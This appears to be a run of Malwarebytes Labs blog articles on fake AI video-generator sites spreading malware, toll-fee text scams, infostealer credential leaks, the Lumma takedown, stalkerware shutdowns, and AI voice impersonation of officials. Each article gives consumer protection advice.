Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Cybercriminals are taking advantage of the public’s interest in Artificial Intelligence (AI) and delivering malware via text-to-video tools.

According to researchers at Mandiant, the criminals are setting up websites claiming to offer “AI video generator” services, and then using those fake tools to distribute information stealers, Trojans, and backdoors.

Links to the malicious websites were brought to the researchers’ attention by ads and links in comments on social media platforms. The researchers uncovered thousands of malicious ads on Facebook and LinkedIn—beginning in November 2024—that promote fake AI video generator tools such as “Luma AI,” “Canva Dream Lab,” and “Kling AI.”

To avoid detection, the group constantly rotates the domain used in the ads and creates new ads every day, while using both compromised and newly created accounts. The campaign operates through more than 30 websites that imitate popular legitimate AI tools.

Researchers identified the first payload as the Starkveil dropper (detected by Malwarebytes/ThreatDown) classified as Trojan.Crypt. The Trojan, written in Rust, requires users to run it twice to fully compromise their machines. After the first run, the malware displays an error window to trick victims into executing it again.

The dropper then deploys the XWorm (detected as Backdoor.XWorm) and Frostrift (detected as Trojan.Crypt) backdoors and the GRIMPULL downloader (also detected as Trojan.Crypt).

After it has fully compromised the system, this constellation of malware will harvest all kinds of data from the infected devices and send it to the cybercriminals using various methods of communication. For a full technical analysis of the malware, feel free to read the researchers’ report.

How to avoid fake AI tool scams

The researchers stated:

“The temptation to try the latest AI tool can lead to anyone becoming a victim.”

So, it’s important to be aware of these campaigns and adopt ways to recognize and thwart them.

• Be vigilant. Posts or ads with high numbers of views that promise free AI text-to-video tools are a red flag and should be examined carefully, especially if they prompt downloads of executable files, which could be disguised as videos.
• Don’t trust unsolicited messages or ads promising unbelievable AI tools or free trials, especially if they pressure you to act quickly or provide personal information.
• Run up-to-date and active protection to intercept these malware infections in the early stages, as well as detect and remove infostealer malware.
• Use web protection in your browser that can recognize and block scams and malicious websites.
• Don’t click on sponsored search results. Any other method to find a link to your coveted product is preferable over sponsored results, since criminals have demonstrated that it pays off to outbid the rightful owners.
• Look out for ads with too-good-to-be-true offers, urgent deadlines, or unusual payment methods like cryptocurrency or wire transfers.
• Scrutinize the provided URLs which might be constructed to look like the “real thing” but they might not be.
• Only download AI software or tools from official, trusted sources or verified app stores.

For more actionable advice on how to spot scams, join our Facebook Live on June 3.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Over a year ago the FBI warned about what was then a new form of smishing (phishing via SMS) scam: text messages that demanded payment for toll fees.

The FTC sent out a similar warning in January, 2025. Then, in April another wave of toll fee scams began doing the rounds.

Now the Departments of Motor Vehicles (DMVs) of New York, Florida, and California are warning residents not to fall for the text message scams that try to trick users into clicking a link by telling them they owe a “small amount” in toll fees.

The amount of smishing messages is a major problem. Reportedly, in April of 2025 alone, Americans received 19.2 billion automated spam texts which amounts to roughly 63 spam texts for every single person in the country.

And it seems to be paying off for the cybercriminals involved in fraud. The FTC’s 2024 Annual Data Book shows that 16% of the reported fraud attempts were text-based, with a criminal revenue of some $470 Million.

How to avoid falling for toll fee scams

• Check the phone number that the text message comes from. Some of the scams we saw were easy to dismiss because they came from telephone numbers outside the US.
• Look for the actual site that handles the alleged toll fees and compare the domain name. Sometimes there is only a small difference, so inspect it carefully.
• If you decided to pay, make sure you receive confirmation of payment. Official toll agencies will send confirmation after collecting payments. If you don’t receive that, call the toll service to check.
• Try never to interact with the scammer in any way. Every reaction provides them with information, even if it’s only that the phone number is in use.
• If you think the toll fee is feasible because you have indeed travelled in that area, check on the official toll service’s website or call their customer service number.
• Malwarebytes Mobile Security for both Android and iOS includes a “Text Protection” feature that alerts users about potentially fraudulent or phishing text messages, helping to prevent scams and other online threats. This feature scans incoming text messages for suspicious content, such as malicious links or suspicious phrases, and warns the user to be cautious. 
• The FBI asks that if you receive a suspicious message, contact the FBI Internet Crime Complaint Center at ic3.gov. Be sure to include the phone number from where the text originated, and the website listed within the text.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

A recent discovery by cybersecurity researcher Jeremiah Fowler of an unsecured database containing over 184 million unique login credentials has once again highlighted the growing threat posed by infostealers. While the sheer volume of exposed data—including emails, passwords, and authorization URLs—is alarming, the real concern is not just about the exposure itself, but in how cybercriminals collect and weaponize these credentials.

This trove of data from a wide range of services like email providers, Microsoft, Facebook, Instagram, Snapchat, Roblox, and many more, doesn’t appear to have been leaked by accident by someone who obtained the data legitimately. More likely, it was amassed by infostealers—malicious software (malware) that are designed specifically to gather sensitive information from infected devices. These malware variants silently extract credentials stored in browsers, email clients, messaging apps, and even crypto wallets. They often arrive via phishing emails, malicious websites, or bundled with cracked software.

An infamous example of an infostealer is the Lumma Stealer, which recently suffered a serious disruption of its infrastructure by authorities. Unfortunately, there are several others which may not be as widespread as Lumma, but at least at the same level of sophistication.

What this means is that the exposed credentials are likely just a fraction of what cybercriminals have already harvested from likely millions of victims worldwide. Each infected device can yield dozens or hundreds of credential sets, multiplying the scale of the problem far beyond a single breach. If a criminal can tie all these different types of stolen information to one person, like the operator of an infostealer would, it would be easy to use those details for identity theft.

The database has since been removed from public view.

How many people are affected?

Given the volume of credentials found, it’s reasonable to assume that millions of individuals had their data included in the exposed database. Since one infected system can leak multiple credentials tied to different accounts and services, the number of victims is likely far smaller than the number of exposed credentials but still alarmingly high.

Infostealers have evolved beyond simple password grabbers. Modern variants can capture autofill data, cookies, screenshots, and keystrokes, giving attackers a comprehensive toolkit to bypass security measures and launch sophisticated attacks. The stolen credentials fuel credential stuffing attacks (where an attacker uses reused logins stolen from one service to access another), account takeovers, identity theft, corporate espionage, and targeted phishing campaigns.

The fact that these credentials span a wide range of services, from social media platforms like Facebook and Instagram to financial institutions, healthcare portals, and even government accounts shows how pervasive infostealer infections have become, enabling attackers to build detailed profiles of victims’ digital lives.

What you can do

There is no way to tell whether anyone else found the exposed database before it was removed from public access. However, the exposure of such a massive dataset should serve as a wake-up call. While the breach itself may no longer be the immediate threat, infostealer malware remains an ongoing and growing threat. Here are some practical steps to protect yourself:

• Change your passwords regularly, and don’t reuse them across multiple accounts. Use unique, complex passwords for every service.
• Enable two-factor authentication (2FA) wherever possible. This makes it harder for criminals to take over your account.
• Regularly audit and clean your email inbox of sensitive documents and old passwords. Jeremiah pointed out that “people unknowingly treat their email accounts like free cloud storage and keep years’ worth of sensitive documents, such as tax forms, medical records, contracts, and passwords without considering how sensitive they are.”
• Use an up-to-date and active anti-malware solution  that can detect and remove infostealer malware.
• Be careful about what you download and educate yourself on recognizing phishing emails, as these remain the most common infection vectors.

Given the scale and sophistication of infostealer operations, it’s not enough to wait for breach notifications to find out whether your credentials have been compromised. That’s why proactive monitoring is essential.

You can use Malwarebytes’ free Digital Footprint Portal to see if any of your data has been stolen by an infostealer and exposed online. We have many millions of stolen records in our database that stem from Lumma stealers alone and are being traded on the dark web. Just put in the email address you use the most, and we’ll tell you what information is out there about you.

Don’t wait for a data breach to impact you. Check your digital footprint and stay one step ahead of cybercriminals.

SCAN NOW

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Last week on Malwarebytes Labs:

• Lumma information stealer infrastructure disrupted
• Stalkerware apps go dark after data breach
• Scammers are using AI to impersonate senior officials, warns FBI
• 23andMe and its customers’ genetic data bought by a pharmaceutical org
• Malware-infected printer delivered something extra to Windows users
• How Los Angeles banned smartphones in schools (Lock and Code S06E10)
• Update your Chrome to fix serious actively exploited vulnerability

Last week on ThreatDown:

• May 2025 Patch Tuesday includes five zero-day vulnerabilities

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The US Department of Justice (DOJ) and Microsoft have disrupted the infrastructure of the Lumma information stealer (infostealer).

Lumma Stealer, also known as LummaC or LummaC2, first emerged in late 2022 and quickly established itself as one of the most prolific infostealers. Infostealers is the name we use for a group of malware that collects sensitive information from infected devices and sends the data to an operator. Depending on the type of infostealer and the goals of the operator, infostealers can be interested in taking anything from usernames and passwords to credit card details, and cryptocurrency wallets.

Lumma operates under a malware-as-a-service (MaaS) model, meaning its creators sell access to the malware on underground marketplaces and platforms like Telegram. This model allows hundreds of cybercriminals worldwide to deploy Lumma for their own malicious campaigns.

What makes Lumma particularly dangerous is its wide range of targets and its evolving sophistication. It doesn’t just grab browser-stored passwords or cookies. It’s also capable of extracting autofill data, email credentials, FTP client data, and even two-factor authentication tokens and backup codes, which enables attackers to bypass additional security layers.

As Matthew R. Galeotti, head of the Justice Department’s Criminal Division put it:

“Malware like LummaC2 is deployed to steal sensitive information such as user login credentials from millions of victims in order to facilitate a host of crimes, including fraudulent bank transfers and cryptocurrency theft.”

Over the last few months alone, Microsoft identified over 394,000 Windows computers infected with Lumma worldwide. The FBI estimates that Lumma has been involved in around 10 million infections globally.

Using a court order from the US District Court for the Northern District of Georgia, Microsoft’s DCU seized and facilitated a takedown, suspension, and blocking of approximately 2,300 malicious domains that were part of the infostealer’s backbone.

Most of the seized domains served as user panels, where Lumma customers are able to access and deploy the infostealer, so this will stop the criminals from being able to to access Lumma in order to compromise computers and steal victim information.

Government agencies and researchers sometimes alter DNS addresses to lead the traffic to their own servers (called sinkholes). By redirecting the seized domains to Microsoft-controlled sinkholes, investigators can now monitor ongoing attacks and provide intelligence to help defend against similar threats in the future. This takedown slows down cybercriminals, disrupts their revenue streams, and buys time and knowledge for defenders to strengthen security.

How to protect yourself

Even with the Lumma infrastructure disrupted, the threat of information stealers remains very real and evolving. Here are some practical steps to reduce your risk:

• Use strong, unique passwords for every account and consider a reputable password manager to keep track of them.
• Enable multi-factor authentication (MFA) wherever possible. Although Lumma tries to bypass 2FA, having it still adds a crucial layer of defense.
• Be cautious with emails and downloads. Lumma often spreads through phishing emails and malicious downloads, sometimes disguised as legitimate CAPTCHAs or antivirus software.
• Keep your software and operating system updated to patch vulnerabilities that malware can exploit.
• Regularly monitor your financial and online accounts for suspicious activity.
• Educate yourself about phishing and social engineering tactics to avoid falling victim to trickery.
• Use an up-to-date real-time anti-malware solution to block install attempts and detect active information stealers.

By understanding how threats like Lumma operate and by taking the necessary steps to protect ourselves, we can reduce the risk of falling prey to these invisible thieves.

You can use Malwarebytes’ free Digital Footprint Portal to see if any of your data has been stolen by a Lumma infostealer. We have many millions of stolen records stemming from Lumma stealers that are being traded on the Dark Web in our database.

SCAN NOW

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

A stalkerware company that recently leaked millions of users’ personal information online has taken all of its assets offline without any explanation. Now Malwarebytes has learned that the company has taken down other apps too.

Back in February, news emerged of a stalkerware app compromise. Reporters at Techcrunch revealed a vulnerability in three such apps: Spyzie, Cocospy, and Spyic. The flaw exposed data from the victim’s devices, rendering their messages, photos, and location data visible to whomever wanted them. It also gave up approximately 3.2 million email addresses entered by the customers that bought and installed these apps on their targets’ devices.

The bug was so easy to exploit that Techcrunch and the researcher involved wouldn’t divulge it, to protect the compromised details.

Now, the apps have gone dark. Techcrunch revealed that the software has stopped working, and the websites advertising it have disappeared. The spyware’s Amazon Web Services storage has also been deleted. The publication speculated that the apps, which were branded separately but looked nearly identical, were possibly shut down to avoid legal repercussions over the data leak.

Stalkerware apps are designed to hide themselves once installed on a person’s phone. They collect data including the location of the device, messages sent by the user, and their contacts.

Spyzie’s web site, now no longer available, marketed the software as a tool to keep an eye on your kids. It advertised itself as “100% hidden and invisible so you never get caught”. It also offered to collect their browser history, WhatsApp messages (including deleted ones), Facebook messages, and call logs. Spyzie claimed to have over a million users in more than 190 countries.

These aren’t the only three apps that the same organization took down. According to archived records of the Spyzie site, it was operated by FamiSoft Limited. That company also produced another app targeting kids called Teensafe (its website is also now down). Other apps now taken down that the company claimed to have operated include Spyier, Neatspy, Fonemonitor, Spyine, and Minspy.

Stalkerware is typically installed by those with direct access to a user’s phone or computer, and typically doesn’t need you to root or jailbreak the device. Spyzie targeted both Android and iPhone platforms. While frequently marketed as a way to keep children safe, theses are also frequently used by abusive partners or ex-partners, as explained by the Federal Trade Commission. The Coalition against Stalkerware, of which Malwabytes is a founding member, offers advice on what to do if you’re being targeted by a stalker.

There have been several instances over the years of stalkerware apps leaking data. It’s especially pernicious because in many cases it isn’t just the email addresses of the stalkerware’s customers that is compromised; it’s the personal details of the people whose phones are being spied upon.

Those people may often not be aware that they’re being surveilled, or might have been forced to install the software against their wishes. They are victimized twice: once when an individual invades their privacy, and twice when crummy infrastructure exposes their information more widely. If a customer really is using such software as a way of protecting their children, they might want to reconsider their choices.

Are you a victim of domestic abuse, or are you worried that someone else is? If you’re in the US, you can contact the National Domestic Abuse Hotline. If you’re in the UK, the government has a useful resource page to help victims and the charity Refuge operates a hotline.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The FBI has issued a warning about an ongoing malicious text and voice messaging campaign that impersonates senior US officials.

The targets are predominantly current or former US federal or state government officials and their contacts. In the course of this campaign, the cybercriminals have used test messages as well as Artificial Intelligence (AI)-generated voice messages.

After establishing contact, the criminals often send targets a malicious link which the sender claims will take the conversation to a different platform. On this messaging platform, the attacker may push malware or introduce hyperlinks that direct targets to a site under the criminals’ control in order to steal login information, like user names and passwords.

The AI-generated audio used in the vishing campaign is designed to impersonate public figures or a target’s friends or family to increase the believability of the malicious schemes. A vishing attack is a type of phishing attack in which a threat actor uses social engineering tactics via voice communication to scam a target—the word “vishing” is a combination of “voice” and “phishing.”

Due to the rapid developments in AI, vishing attacks are becoming more common and more convincing. We have seen reports about callers pretending to be employers, family, and now government officials. What they have in common is that they are after information they can use to steal money or sensitive information from the victim.

How to stay safe

Because these campaigns are very sophisticated and targeted, it’s important to stay vigilant. Some recommendations:

• Independently verify the identity of the person contacting you, via a different method.
• Carefully examine the origin of the message. The criminals typically use software to generate phone numbers that are not attributed to a specific mobile phone or subscriber.
• Listen closely to the tone and word choice of the caller. Do they match those of the person allegedly calling you? And pay attention to any kind of voice call lag time.
• AI-generated content has advanced to the point that it is often difficult to identify. When in doubt about the authenticity of someone wishing to communicate with you, contact your relevant security officials or the FBI for help.

If you believe you have been the victim of the campaign described above, contact your relevant security officials and report the incident to your local FBI Field Office or the Internet Crime Complaint Center (IC3) at www.ic3.gov. Be sure to include as much detailed information as possible.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.